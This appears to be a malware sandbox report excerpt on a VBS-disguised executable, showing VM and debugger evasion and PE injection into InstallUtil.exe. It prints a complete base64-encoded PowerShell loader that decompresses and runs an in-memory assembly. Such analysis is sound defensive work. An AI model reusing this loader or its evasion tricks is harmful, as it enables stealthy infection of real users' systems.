Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797884	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797769	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797646	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99418
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99202
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799929
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798775
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798546
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99419
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99302
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1798077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797745
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1797093

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: InstallUtil.exe, 00000015.00000002.2715317704.0000000003021000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: Nwjbuywyew.vbs.exe, 00000013.00000002.1930691615.0000000006FDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll17
Source: wscript.exe, 0000000F.00000003.1819477248.00000233EE657000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%B0
Source: wscript.exe, 00000000.00000003.1420440732.0000026511C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ExitCode M
Source: InstallUtil.exe, 00000015.00000002.2715317704.0000000003021000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004A59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004A59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1618551186.0000000007295000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1819363055.00000000064D1000.00000004.00000020.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1908086625.0000000007C14000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 7_2_02FC70B0 CheckRemoteDebuggerPresent,

7_2_02FC70B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 110E008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D53008

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYA